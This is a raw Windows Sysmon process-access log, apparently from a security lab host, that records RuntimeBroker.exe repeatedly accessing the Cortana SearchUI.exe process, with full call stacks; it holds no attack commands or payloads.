12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 